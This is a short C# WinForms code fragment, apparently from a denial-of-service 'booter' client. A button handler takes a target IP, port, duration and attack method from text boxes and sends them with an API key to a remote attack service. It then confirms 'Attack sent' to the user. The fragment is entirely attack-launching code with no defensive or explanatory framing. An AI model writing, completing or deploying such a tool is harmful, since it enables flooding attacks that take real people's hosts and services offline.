
        private void SendAttack_Click(object sender, EventArgs e)
        {
            string ip = IPAddress.Text;
            string port = Port.Text;
            string time = Time.Text;
            string method = Methods.Text;
 
                WebClient wc = new WebClient { }; wc.DownloadString($"https://google.com/api/?key=gaybattyman&ip={ip}&port={port}&time={time}&method={method}");
                MessageBox.Show($"Attack sent to {ip} using port {port} for {time} Second/s");
 
            }
        }
    }